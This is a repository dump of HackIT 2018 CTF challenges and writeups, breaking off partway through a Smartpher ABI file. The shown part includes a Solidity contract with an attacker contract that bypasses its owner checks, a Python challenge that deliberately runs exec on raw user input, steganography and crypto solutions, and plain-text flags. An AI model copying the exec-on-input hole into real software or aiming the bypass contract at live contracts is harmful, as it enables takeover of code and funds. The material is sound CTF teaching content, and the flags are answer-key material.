├── README.md ├── misc ├── Bulwarck │ ├── README.md │ ├── bulwarck.sol │ └── solution │ │ └── solution.sol ├── Get Going │ ├── README.md │ ├── index.html │ └── solution │ │ └── README.md ├── Inves2gate │ ├── README.md │ ├── challenge-misc01.png │ └── solution │ │ └── README.md ├── PyCry │ ├── README.md │ ├── decrypt.py │ └── encrypt.py ├── Smartpher │ ├── README.md │ ├── message.txt │ ├── smartpher.bytecode │ └── solution │ │ ├── README.md │ │ ├── rotcustom.sol │ │ ├── smartpher.abi │ │ └── solve.py └── TrapOSaur │ ├── README.md │ ├── misc03.pyc │ └── solution │ └── README.md ├── pwn ├── A Heap Interface │ ├── README.md │ ├── exploit.py │ └── heap_interface ├── Army │ ├── README.md │ ├── army │ └── exploit_army.py ├── Bank reimplemented │ ├── README.md │ ├── chall2-bank │ └── exploit_bank.py ├── HashMan │ ├── README.md │ ├── exploit.py │ └── hash_man └── KAMIKAZE │ ├── README.md │ ├── kamikaze │ └── poc.py └── web ├── BabyPeeHPee ├── README.md ├── auth.id0 ├── auth.id1 ├── auth.id2 ├── auth.nam ├── auth.so ├── auth.til ├── flag.php └── index.php ├── PeeHPee2 ├── README.md └── index.php ├── Republic_of_Gayming ├── README.md ├── app.js └── run.sh └── RuAdmin ├── .gitignore ├── Gemfile ├── README.md ├── Rakefile ├── app ├── assets │ ├── config │ │ └── manifest.js │ ├── images │ │ └── .keep │ ├── javascripts │ │ ├── application.js │ │ ├── cable.js │ │ ├── channels │ │ │ └── .keep │ │ ├── resumes.coffee │ │ ├── sessions.coffee │ │ └── users.coffee │ └── stylesheets │ │ ├── application.css │ │ ├── resumes.scss │ │ ├── sessions.scss │ │ └── users.scss ├── channels │ └── application_cable │ │ ├── channel.rb │ │ └── connection.rb ├── controllers │ ├── application_controller.rb │ ├── concerns │ │ └── .keep │ ├── home_controller.rb │ ├── resumes_controller.rb │ └── sessions_controller.rb ├── helpers │ ├── application_helper.rb │ ├── resumes_helper.rb │ ├── sessions_helper.rb │ └── users_helper.rb ├── jobs │ └── application_job.rb ├── mailers │ └── application_mailer.rb ├── models │ ├── application_record.rb │ ├── concerns │ │ └── .keep │ ├── resume.rb │ └── user.rb ├── uploaders │ └── attachment_uploader.rb └── views │ ├── home │ └── index.html.erb │ ├── layouts │ ├── application.html.erb │ ├── mailer.html.erb │ └── mailer.text.erb │ ├── resumes │ ├── create.html.erb │ ├── destroy.html.erb │ ├── index.html.erb │ └── new.html.erb │ └── sessions │ ├── admin.html.erb │ └── new.html.erb ├── bin ├── bundle ├── rails ├── rake ├── setup ├── spring └── update ├── config.ru ├── config ├── application.rb ├── boot.rb ├── cable.yml ├── database.yml ├── environment.rb ├── environments │ ├── development.rb │ ├── production.rb │ └── test.rb ├── initializers │ ├── application_controller_renderer.rb │ ├── assets.rb │ ├── backtrace_silencers.rb │ ├── cookies_serializer.rb │ ├── filter_parameter_logging.rb │ ├── inflections.rb │ ├── mime_types.rb │ ├── new_framework_defaults.rb │ ├── session_store.rb │ └── wrap_parameters.rb ├── locales │ └── en.yml ├── puma.rb ├── routes.rb ├── secrets.yml └── spring.rb ├── db ├── migrate │ ├── 20180822104110_create_users.rb │ └── 20180822113826_create_resumes.rb ├── schema.rb └── seeds.rb ├── fl4g_is_h3re └── flag.txt ├── lib ├── assets │ └── .keep └── tasks │ └── .keep ├── log └── .keep ├── public ├── 404.html ├── 422.html ├── 500.html ├── apple-touch-icon-precomposed.png ├── apple-touch-icon.png ├── favicon.ico ├── public │ └── uploads │ │ └── resumes │ │ └── hax.c └── robots.txt ├── test ├── controllers │ ├── .keep │ ├── resumes_controller_test.rb │ ├── sessions_controller_test.rb │ └── users_controller_test.rb ├── fixtures │ ├── .keep │ ├── files │ │ └── .keep │ ├── resumes.yml │ └── users.yml ├── helpers │ └── .keep ├── integration │ └── .keep ├── mailers │ └── .keep ├── models │ ├── .keep │ ├── resume_test.rb │ └── user_test.rb └── test_helper.rb ├── tmp └── .keep └── vendor └── assets ├── javascripts └── .keep └── stylesheets └── .keep /README.md: -------------------------------------------------------------------------------- 1 | # HackIT2018 Writeups 2 | -------------------------------------------------------------------------------- /misc/Bulwarck/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/misc/Bulwarck/README.md -------------------------------------------------------------------------------- /misc/Bulwarck/bulwarck.sol: -------------------------------------------------------------------------------- 1 | pragma solidity ^0.4.18; 2 | 3 | contract Bulwarck{ 4 | uint points; 5 | address public owner; 6 | string public x; 7 | string public y; 8 | 9 | function Bulwarck(string _x, string _y) 10 | { 11 | owner = msg.sender; 12 | x = _x; 13 | y = _y; 14 | } 15 | 16 | function blooper(address addr) private returns(bool) 17 | { 18 | uint x; 19 | assembly { x := extcodesize(caller) } 20 | return x == 0; 21 | } 22 | 23 | function check(string a, string b) private returns(bool){ 24 | if(keccak256(x)==keccak256(a) || keccak256(y)==keccak256(b)){ 25 | return false; 26 | }else{ 27 | if( keccak256(x,y) == keccak256(a,b)){ 28 | return true; 29 | }else{ 30 | return false; 31 | } 32 | } 33 | } 34 | 35 | function jumpOver(bytes8 key, string x, string y) 36 | { 37 | require(msg.sender != tx.origin); 38 | require(blooper(msg.sender)); 39 | require(uint32(key) != uint64(key)); 40 | require(uint32(key) == uint16(tx.origin)); 41 | require(check(x,y)); 42 | 43 | owner = tx.origin; 44 | } 45 | } -------------------------------------------------------------------------------- /misc/Bulwarck/solution/solution.sol: -------------------------------------------------------------------------------- 1 | pragma solidity ^0.4.18; 2 | 3 | contract Bulwarck{ 4 | uint points; 5 | address public owner; 6 | string public x; 7 | string public y; 8 | 9 | function Bulwarck(string _x, string _y) 10 | { 11 | owner = msg.sender; 12 | x = _x; 13 | y = _y; 14 | } 15 | 16 | function blooper(address addr) private returns(bool) 17 | { 18 | uint x; 19 | assembly { x := extcodesize(caller) } 20 | return x == 0; 21 | } 22 | 23 | function check(string a, string b) private returns(bool){ 24 | if(keccak256(x)==keccak256(a) || keccak256(y)==keccak256(b)){ 25 | return false; 26 | }else{ 27 | if( keccak256(x,y) == keccak256(a,b)){ 28 | return true; 29 | }else{ 30 | return false; 31 | } 32 | } 33 | } 34 | 35 | function jumpOver(bytes8 key, string x, string y) 36 | { 37 | require(msg.sender != tx.origin); 38 | require(blooper(msg.sender)); 39 | require(uint32(key) != uint64(key)); 40 | require(uint32(key) == uint16(tx.origin)); 41 | require(check(x,y)); 42 | 43 | owner = tx.origin; 44 | } 45 | } 46 | 47 | contract Hack_Bulwarck { 48 | 49 | address public target = address; // Replace it 50 | bytes8 public _gateKey = bytes8(tx.origin) & 0xFFFFFFFF0000FFFF; 51 | string x="listen to man"; 52 | string y="yspeak to few"; 53 | constructor() 54 | { 55 | Bulwarck b = Bulwarck(target); 56 | b.jumpOver(_gateKey,x,y); 57 | } 58 | } -------------------------------------------------------------------------------- /misc/Get Going/README.md: -------------------------------------------------------------------------------- 1 | # Get Going 2 | -------------------------------------------------------------------------------- /misc/Get Going/index.html: -------------------------------------------------------------------------------- 1 | W​​​​‏​‍​​​​‏‌‎​​​​‎‏‍​​​​‏​‎​​​​‏‏‎​​​​‏‎‏​​​​‍​‌​​​​‎‏​​​​​‏​‎​​​​‏‍‏​​​​‍​‌​​​​‍​‌​​​​‍‌​​​​​‎‏​​​​​‏​‏​​​​‍​‍​​​​‎‏‏​​​​‏‌‍​​​​‍​‌​​​​‏‍‏​​​​‏‏‍​​​​‎‏​​​​​‏‎‏​​​​‌‏‏​​​​‏‎‌​​​​‏​‏​​​​‎‏​​​​​‏‎‍​​​​‏‍​​​​​‌‏‏​​​​‎‏‏​​​​‌‏‎​​​​‏​​​​​​‍​‌​​​‌​​​elcome to the HackIT 2018 CTF, flag is somewhere here. ¯_(ツ)_/¯ 2 | -------------------------------------------------------------------------------- /misc/Get Going/solution/README.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | This concept is called 'Zero-Width Steganography' which has not been covered in any CTFs, There is a library for decoding https://github.com/offdev/zwsp-steg-js or can be manually decoded. 4 | There is nothing to guess, as Intention is players will open console & look at the ASCII text which isn't all ASCII but has unicode as well 5 | 6 | flag{w3_gr337_h4ck3rz_w1th_un1c0d3} 7 | -------------------------------------------------------------------------------- /misc/Inves2gate/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/misc/Inves2gate/README.md -------------------------------------------------------------------------------- /misc/Inves2gate/challenge-misc01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/misc/Inves2gate/challenge-misc01.png -------------------------------------------------------------------------------- /misc/Inves2gate/solution/README.md: -------------------------------------------------------------------------------- 1 | Part 1: https://ropsten.etherscan.io/tx/0xb61227a91466026ea2f2670bd7725ac00bd7eb198ed71799ecadb6de3647f91e 2 | (flag{5cann1ng_) 3 | 4 | Part 2: https://ropsten.etherscan.io/tx/0xc02fc19b9c2587af1d1aab6aef9093f4b5fca6a0731e373ab4b584bb15a0170e 5 | (wh013_bl0ckch41n_4) 6 | 7 | Part 3: https://ropsten.etherscan.io/tx/0x1bc37a84ae691623c4043457fd3084044354ee656d349213fd63e5da1450ac9e 8 | The contract 0xb4c5ef28a38ffbd1095cc8d1ba947fb0e9a61e4a has storage which needs to be leaked 9 | web3.eth.getStorageAt('0xb4c5ef28a38ffbd1095cc8d1ba947fb0e9a61e4a', 1, function(x, y) {alert(web3.toAscii(y))}); 10 | (ctf_fl4g_i5_4_skill) 11 | 12 | Part 4: https://ropsten.etherscan.io/tx/0xd4e690ebfeabc1d61fabc2eda20df666633d9caf466f3e0dafdcc5616035df52 13 | https://ropsten.etherscan.io/address/0x0ea92008f4ccc6295e99908e35469fe9ca63787d 14 | web3.eth.getStorageAt('0x0ea92008f4ccc6295e99908e35469fe9ca63787d', 0, function(x, y) {alert(web3.toAscii(y))}); 15 | (_to_nuture}) 16 | 17 | overall : flag{5cann1ng_wh013_bl0ckch41n_4ctf_fl4g_i5_4_skill_to_nuture} -------------------------------------------------------------------------------- /misc/PyCry/README.md: -------------------------------------------------------------------------------- 1 | This Challenge is a python blackbox, where the second user input supplied is directly executed, the script dropped the privileges to a regular user with no read privs, and chrooted so that people do not tamper with ENV variables etc ... 2 | The idea is basically dump all globals, you will notice the function hint which states explicitly the goal of the challenge which is using dis to reverse the bytecode of each encryption function. 3 | After rebuilding the original encryption routine, it becomes a trivial crypto problem. 4 | Note: for decryption see decrypt.py 5 | -------------------------------------------------------------------------------- /misc/PyCry/decrypt.py: -------------------------------------------------------------------------------- 1 | import string,random 2 | 3 | def func3d(encryped, key): 4 | msg = [] 5 | for i, c in enumerate(encryped): 6 | key_c = ord(key[i % len(key)]) 7 | enc_c = ord(c) 8 | msg.append(chr((enc_c - key_c) % 127)) 9 | return ''.join(msg) 10 | 11 | 12 | def func2d(d): 13 | try: 14 | e = d[::-1] 15 | k = int(e[:4], 16) ^ 0xA9F ^ 0xE77E 16 | t = e[4:] 17 | f = "" 18 | n = 0 19 | for i in range(0, len(t), 6): 20 | n += 1 21 | c = (n * n) ^ 0x3E 22 | f += chr(int(str(int(t[i:i+6], 16)), 8) ^ (k ^ 0xAFE43 ^ 0x399AA3 ^ c)) 23 | return f 24 | except: 25 | return -1 26 | 27 | def func4d(str): 28 | dec = funcwtf(-1337) 29 | return dec(str) 30 | 31 | def funcwtf(n): 32 | if n > 0: 33 | n = n % 20 34 | else : 35 | n = -((-n) % 20) 36 | lc = string.ascii_lowercase 37 | uc = string.ascii_uppercase 38 | trans = string.maketrans(lc + uc, 39 | lc[n:] + lc[:n] + uc[n:] + uc[:n]) 40 | return lambda s: string.translate(s, trans) 41 | 42 | 43 | def func1d(str1, str2): 44 | tmp = "" 45 | str1 = str1[::-1] 46 | for i in range(len(str1)): 47 | if i%2 == 0 : 48 | tmp += chr((ord(str1[i]) - 4)^ord(str2[i])) 49 | else: 50 | tmp += chr((ord(str1[i]) + 2)^ord(str2[i])) 51 | return tmp 52 | 53 | 54 | 55 | print func1d(func3d(func4d(func2d('0A3BFDA6EBFD5CEBFD1ADBFDBEDBFD1DFBFDF10CFD51FBFD51FBFDBEEBFDB3ABFD3DABFD2DABFD589BFDD79BFD9E9BFD10ABFDDFBBFDAFBBFDD4CBFD77CBFD42BBFD91BBFDC2BBFDB4BBFDE7BBFDB6BBFDF0BBFD2ABBFD22BBFD39BBFDE2BBFDB1CE')),'looooool'),'a6105c0a611b41b08f1209506350279e') 56 | -------------------------------------------------------------------------------- /misc/PyCry/encrypt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | import random,string 4 | 5 | #os.chroot('/home/chal/pychal') 6 | #os.setresgid(1003,1003,1003) 7 | #os.setresuid(1003,1003,1003) 8 | def func1e(str1, str2): 9 | tmp = "" 10 | for i in range(len(str1)): 11 | if i%2 == 0 : 12 | tmp += chr((ord(str1[i])^ord(str2[i])) + 4) 13 | else: 14 | tmp += chr((ord(str1[i])^ord(str2[i])) - 2) 15 | return tmp[::-1] 16 | 17 | 18 | 19 | def func2e(d): 20 | try: 21 | k = random.randint(1, 1024) 22 | n = 0 23 | f = "" 24 | for i in range(len(d)): 25 | n += 1 26 | c = (n * n) ^ 0x3E 27 | f += ("00000" + hex(int(oct(ord(d[i]) ^ (k ^ 0xAFE43 ^ 0x399AA3 ^ c))))[2:])[-6:] 28 | f = (("000" + hex(k ^ 0xA9F ^ 0xE77E)[2:])[-4:] + f)[::-1].upper() 29 | return f 30 | except: 31 | return -1 32 | 33 | 34 | 35 | def func3e(msg, key): 36 | encryped = [] 37 | for i, c in enumerate(msg): 38 | key_c = ord(key[i % len(key)]) 39 | msg_c = ord(c) 40 | encryped.append(chr((msg_c + key_c) % 127)) 41 | return ''.join(encryped) 42 | 43 | 44 | 45 | def funcwtf(n): 46 | if n > 0: 47 | n = n % 20 48 | else : 49 | n = -((-n) % 20) 50 | lc = string.ascii_lowercase 51 | uc = string.ascii_uppercase 52 | trans = string.maketrans(lc + uc, 53 | lc[n:] + lc[:n] + uc[n:] + uc[:n]) 54 | return lambda s: string.translate(s, trans) 55 | 56 | 57 | def func4e(str): 58 | enc = funcwtf(1337) 59 | return enc(str) 60 | 61 | 62 | def hint(): 63 | hint = "The flag was encrypted using func2e(func4e(func3e(func1e('flag{redacted}','a6105c0a611b41b08f1209506350279e'),'looooool')))" 64 | hint += "\nI think the output was : 0A3BFDA6EBFD5CEBFD1ADBFDBEDBFD1DFBFDF10CFD51FBFD51FBFDBEEBFDB3ABFD3DABFD2DABFD589BFDD79BFD9E9BFD10ABFDDFBBFDAFBBFDD4CBFD77CBFD42BBFD91BBFDC2BBFDB4BBFDE7BBFDB6BBFDF0BBFD2ABBFD22BBFD39BBFDE2BBFDB1CE" 65 | hint += "\nYou guessed right, your goal is to retrieve the flag using your python, reversing and crypto skills" 66 | hint += "\nGood luck!" 67 | print hint 68 | 69 | def drunkenc(): 70 | encrypted = func2e(func4e(func3e(func1e('flag{redacted}','a6105c0a611b41b08f1209506350279e'),'looooool'))) 71 | 72 | 73 | if __name__ == '__main__': 74 | name = raw_input("hey bro whats ur name ? : ") 75 | print "Nice to meet you %s, do you wanna hack?"%name 76 | exec(raw_input()) 77 | -------------------------------------------------------------------------------- /misc/Smartpher/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/misc/Smartpher/README.md -------------------------------------------------------------------------------- /misc/Smartpher/message.txt: -------------------------------------------------------------------------------- 1 | Hi Wooble hackers, 2 | I wrote a super secure message encryption system to secure our communication so that FeeNetwork couldn't get our secret access to the chamber. 3 | The code to our secret chamber access code is given below which I generated from our system 4 | 5 | tphzqh}v}uivyznwju 6 | 7 | I combined blockchain and crypto to make double sure everything is good. I attach you other file, but I was too lazy to finish it though. Also, to access the chamber please decrypt the above access code and wrap with flag{...} 8 | 9 | Thanks, 10 | Wooble Team -------------------------------------------------------------------------------- /misc/Smartpher/smartpher.bytecode: -------------------------------------------------------------------------------- 1 | 608060405260043610610099576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680632981c3ff1461009e57806337c8bea0146101235780638c1da162146101be5780638d64b9a8146102275780638da5cb5b14610309578063c060ac5314610360578063d9c7f48a14610415578063ddc9b178146104f7578063e106fb4b146105d9575b600080fd5b3480156100aa57600080fd5b50610105600480360381019080803590602001908201803590602001908080601f01602080910402602001604051908101604052809392919081815260200183838082843782019150505050505091929192905050506106bb565b60405180826000191660001916815260200191505060405180910390f35b34801561012f57600080fd5b5061018a600480360381019080803590602001908201803590602001908080601f01602080910402602001604051908101604052809392919081815260200183838082843782019150505050505091929192905050506106ea565b60405180826bffffffffffffffffffffffff19166bffffffffffffffffffffffff1916815260200191505060405180910390f35b3480156101ca57600080fd5b50610225600480360381019080803590602001908201803590602001908080601f0160208091040260200160405190810160405280939291908181526020018383808284378201915050505050509192919290505050610adc565b005b34801561023357600080fd5b5061028e600480360381019080803590602001908201803590602001908080601f0160208091040260200160405190810160405280939291908181526020018383808284378201915050505050509192919290505050610b51565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156102ce5780820151818401526020810190506102b3565b50505050905090810190601f1680156102fb5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561031557600080fd5b5061031e610ff3565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34801561036c57600080fd5b5061039a60048036038101908080356bffffffffffffffffffffffff19169060200190929190505050611018565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156103da5780820151818401526020810190506103bf565b50505050905090810190601f1680156104075780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561042157600080fd5b5061047c600480360381019080803590602001908201803590602001908080601f0160208091040260200160405190810160405280939291908181526020018383808284378201915050505050509192919290505050611220565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156104bc5780820151818401526020810190506104a1565b50505050905090810190601f1680156104e95780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561050357600080fd5b5061055e600480360381019080803590602001908201803590602001908080601f0160208091040260200160405190810160405280939291908181526020018383808284378201915050505050509192919290505050611831565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561059e578082015181840152602081019050610583565b50505050905090810190601f1680156105cb5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b3480156105e557600080fd5b50610640600480360381019080803590602001908201803590602001908080601f01602080910402602001604051908101604052809392919081815260200183838082843782019150505050505091929192905050506118f9565b6040518080602001828103825283818151815260200191508051906020019080838360005b83811015610680578082015181840152602081019050610665565b50505050905090810190601f1680156106ad5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6000807f576173207665727920626f72656420746f20696d706c656d656e742074686973905080915050919050565b600060e060020a60003504631605782b811461070557600080fd5b5060048035018035602082019150604067ffffffffffffffc0600183011601600982820310600181146107375761073e565b6040820191505b50776745230100efcdab890098badcfe001032547600c3d2e1f060005b82811015610a685760408186016000376040818503106001811461077e57610785565b6080828603535b5060408303811460018114610799576107a5565b60088502602051176020525b5060405b60808110156108275760408103516038820351186020820351600c83035118187c0100000001000000010000000100000001000000010000000100000001601f60020a8204167ffffffffefffffffefffffffefffffffefffffffefffffffefffffffefffffffe600283021617905080825250600c810190506107a9565b5060805b6101408110156108aa5760808103516070820351186040820351601883035118187c0300000003000000030000000300000003000000030000000300000003601e60020a8204167ffffffffcfffffffcfffffffcfffffffcfffffffcfffffffcfffffffcfffffffc60048302161790508082525060188101905061082b565b508160008060005b6050811015610a3a5760148104600081146108e45760018114610917576002811461093f576003811461097a5761099e565b602860020a8504605060020a860418935083607860020a860416935083602860020a8604189350635a827999925061099e565b605060020a8504607860020a860418935083602860020a8604189350636ed9eba1925061099e565b605060020a8504607860020a860417935083602860020a860416935083605060020a8604607860020a870416179350638f1bbcdc925061099e565b605060020a8504607860020a860418935083602860020a860418935063ca62c1d692505b50601f60bb60020a8504168063ffffffe0609b60020a87041617905080840190508063ffffffff861601905080830190508060e060020a60048402510401905060a060020a8102602860020a8604179450605060020a633fffffff605260020a87041663c0000000603260020a880416170277ffffffff00ffffffff000000000000ffffffff00ffffffff8616179450506001810190506108b2565b5077ffffffff00ffffffff00ffffffff00ffffffff00ffffffff83860116945050505060408101905061075b565b5063ffffffff811667ffffffff00000000600860020a8304166bffffffff0000000000000000601060020a8404166fffffffff000000000000000000000000601860020a85041673ffffffff00000000000000000000000000000000602060020a860416171717179050806000526014600cf35b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16141515610b3757600080fd5b8060039080519060200190610b4d929190611907565b5050565b6060806000606060008060046003805460018160011615610100020316600290049050141515610b8057600080fd5b610c2360038054600181600116156101000203166002900480601f016020809104026020016040519081016040528092919081815260200182805460018160011615610100020316600290048015610c195780601f10610bee57610100808354040283529160200191610c19565b820191906000526020600020905b815481529060010190602001808311610bfc57829003601f168201915b50505050506118f9565b9450610c2e856106ea565b9350610c3984611018565b925060405180807f346436343735326361646465366561303139373537653039636533373461613181526020017f62646261383164660000000000000000000000000000000000000000000000008152506028019050604051809103902060001916836040518082805190602001908083835b602083101515610cd15780518252602082019150602081019050602083039250610cac565b6001836020036101000a038019825116818451168082178552505050505050905001915050604051809103902060001916141515610d0e57600080fd5b600487511115610fe55760028751039150600390508660028303815181101515610d3457fe5b9060200101517f010000000000000000000000000000000000000000000000000000000000000090047f0100000000000000000000000000000000000000000000000000000000000000028783815181101515610d8d57fe5b9060200101517f010000000000000000000000000000000000000000000000000000000000000090047f0100000000000000000000000000000000000000000000000000000000000000028260008154600181600116156101000203166002900481101515610df857fe5b815460011615610e175790600052602060002090602091828204019190065b9054901a7f01000000000000000000000000000000000000000000000000000000000000000218188783815181101515610e4d57fe5b9060200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a9053508660088303815181101515610e8e57fe5b9060200101517f010000000000000000000000000000000000000000000000000000000000000090047f0100000000000000000000000000000000000000000000000000000000000000028760048403815181101515610eea57fe5b9060200101517f010000000000000000000000000000000000000000000000000000000000000090047f0100000000000000000000000000000000000000000000000000000000000000028260028154600181600116156101000203166002900481101515610f5557fe5b815460011615610f745790600052602060002090602091828204019190065b9054901a7f01000000000000000000000000000000000000000000000000000000000000000218188760048403815181101515610fad57fe5b9060200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a905350869550610fe9565b6038565b5050505050919050565b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6060806000806000606060146040519080825280601f01601f1916602001820160405280156110565781602001602082028038833980820191505090505b50945060009350600092505b601483101561112c578260080260020a876c01000000000000000000000000900402600102915060007f010000000000000000000000000000000000000000000000000000000000000002827effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614151561111f578185858151811015156110e657fe5b9060200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a90535083806001019450505b8280600101935050611062565b836040519080825280601f01601f19166020018201604052801561115f5781602001602082028038833980820191505090505b509050600092505b8383101561121357848381518110151561117d57fe5b9060200101517f010000000000000000000000000000000000000000000000000000000000000090047f01000000000000000000000000000000000000000000000000000000000000000281848151811015156111d657fe5b9060200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a9053508280600101935050611167565b8095505050505050919050565b6060600060606000600c4314151561123757600080fd5b439250600a60405190808252806020026020018201604052801561126a5781602001602082028038833980820191505090505b5091506002602083015260186040830152600d606083015260116080830152600860a0830152600960c0830152600a60e08301526005610100830152600361012083015260076101408301523073ffffffffffffffffffffffffffffffffffffffff1663ddc9b178866040518263ffffffff167c01000000000000000000000000000000000000000000000000000000000281526004018080602001828103825283818151815260200191508051906020019080838360005b8381101561133e578082015181840152602081019050611323565b50505050905090810190601f16801561136b5780820380516001836020036101000a031916815260200191505b5092505050600060405180830381600087803b15801561138a57600080fd5b505af115801561139e573d6000803e3d6000fd5b505050506040513d6000823e3d601f19601f8201168201806040525060208110156113c857600080fd5b8101908080516401000000008111156113e057600080fd5b828101905060208101848111156113f657600080fd5b815185600182028301116401000000008211171561141357600080fd5b505092919050505060019080519060200190611430929190611907565b50600160029080546001816001161561010002031660029004611454929190611987565b50600090505b60028054600181600116156101000203166002900490508110156115cf57827f01000000000000000000000000000000000000000000000000000000000000000282600a600384018115156114ab57fe5b068151811015156114b857fe5b906020019060200201517f010000000000000000000000000000000000000000000000000000000000000002600283815460018160011615610100020316600290048110151561150457fe5b8154600116156115235790600052602060002090602091828204019190065b9054901a7f0100000000000000000000000000000000000000000000000000000000000000021818600282815460018160011615610100020316600290048110151561156b57fe5b81546001161561158a5790600052602060002090602091828204019190065b601f036101000a81548160ff021916907f010000000000000000000000000000000000000000000000000000000000000084040217905550808060010191505061145a565b3073ffffffffffffffffffffffffffffffffffffffff16638d64b9a860026040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180806020018281038252838181546001816001161561010002031660029004815260200191508054600181600116156101000203166002900480156116a15780601f10611676576101008083540402835291602001916116a1565b820191906000526020600020905b81548152906001019060200180831161168457829003601f168201915b505092505050600060405180830381600087803b1580156116c157600080fd5b505af11580156116d5573d6000803e3d6000fd5b505050506040513d6000823e3d601f19601f8201168201806040525060208110156116ff57600080fd5b81019080805164010000000081111561171757600080fd5b8281019050602081018481111561172d57600080fd5b815185600182028301116401000000008211171561174a57600080fd5b505092919050505060029080519060200190611767929190611a0e565b5060026001908054600181600116156101000203166002900461178b929190611a8e565b5060018054600181600116156101000203166002900480601f0160208091040260200160405190810160405280929190818152602001828054600181600116156101000203166002900480156118225780601f106117f757610100808354040283529160200191611822565b820191906000526020600020905b81548152906001019060200180831161180557829003601f168201915b50505050509350505050919050565b6060600080600084519250600091505b828260ff1610156118ee57848260ff1681518110151561185d57fe5b9060200101517f010000000000000000000000000000000000000000000000000000000000000090047f01000000000000000000000000000000000000000000000000000000000000000290508060001a9050607b8110606d821116156118c85780607a0360600390505b6020811415156118e15760138101600183026020870101535b8180600101925050611841565b849350505050919050565b606060208201519050919050565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f1061194857805160ff1916838001178555611976565b82800160010185558215611976579182015b8281111561197557825182559160200191906001019061195a565b5b5090506119839190611b15565b5090565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f106119c057805485556119fd565b828001600101855582156119fd57600052602060002091601f016020900482015b828111156119fc5782548255916001019190600101906119e1565b5b509050611a0a9190611b15565b5090565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f10611a4f57805160ff1916838001178555611a7d565b82800160010185558215611a7d579182015b82811115611a7c578251825591602001919060010190611a61565b5b509050611a8a9190611b15565b5090565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f10611ac75780548555611b04565b82800160010185558215611b0457600052602060002091601f016020900482015b82811115611b03578254825591600101919060010190611ae8565b5b509050611b119190611b15565b5090565b611b3791905b80821115611b33576000816000905550600101611b1b565b5090565b905600a165627a7a723058209843f9ca8cd0382bb0618c4af2822bfca226f69ebe755bb5e49fb5483022a1070029 -------------------------------------------------------------------------------- /misc/Smartpher/solution/README.md: -------------------------------------------------------------------------------- 1 | Step 1: Reverse the EVM file and figure out the encryption function. 2 | 3 | Step 2: Retrieve and Brute force the seed given the SHA-1 Hash & seed.length == 4 4 | 5 | Step 3: Use the solve.py to retrieve the half-decrypted hash by implementing decryption routine. 6 | 7 | Step 4: Now, implement the custom reverse of ROT-19 encoding which solidity code has implemented. Using online ROT-7 will provide wrong decryption as author has tweaked the ROT-19 Algorithm during encryption process. 8 | 9 | Step 5: Append the retrieved plain-text with flag{...} and submit to receive points 10 | 11 | Detailed explaination in solve.py file. 12 | 13 | flag{patiencepaaysineth} -------------------------------------------------------------------------------- /misc/Smartpher/solution/rotcustom.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.4.24; 2 | 3 | contract rotcustom{ 4 | 5 | function rotDecryptionCustom(string text) view public returns(string) { 6 | uint256 length = bytes(text).length; 7 | for (var i = 0; i < length; i++) { 8 | byte char = bytes(text)[i]; 9 | assembly { 10 | char := byte(0,char) 11 | if and(gt(char,0x60), lt(char,0x6E)) 12 | { char:= add(0x7B, sub(char,0x61)) } 13 | if iszero(eq(char, 0x20)) 14 | {mstore8(add(add(text,0x20), mul(i,1)), sub(char,19))} 15 | } 16 | } 17 | return text; 18 | } 19 | 20 | } -------------------------------------------------------------------------------- /misc/Smartpher/solution/smartpher.abi: -------------------------------------------------------------------------------- 1 | [{"constant":true,"inputs":[{"name":"text","type":"string"}],"name":"Decrypt","outputs":[{"name":"","type":"bytes32"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"message","type":"bytes"}],"name":"laala","outputs":[{"name":"ret","type":"bytes20"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_seed","type":"string"}],"name":"setseed","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"name":"feed","type":"bytes"}],"name":"aXeJ","outputs":[{"name":"","type":"bytes"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"x","type":"bytes20"}],"name":"bytes20ToString","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"text","type":"string"}],"name":"zMx","outputs":[{"name":"","type":"string"}],"payable":false,"stateMuta